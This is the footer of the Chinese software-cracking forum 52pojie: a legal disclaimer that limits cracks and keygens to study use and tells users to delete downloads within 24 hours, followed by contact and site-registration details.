吾爱破解所发布的一切破解补丁、注册机和注册信息及软件的解密分析文章仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容。如果您喜欢该程序,请支持正版软件,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。

Mail To:Service@52pojie.cn

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2025-3-27 13:31

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表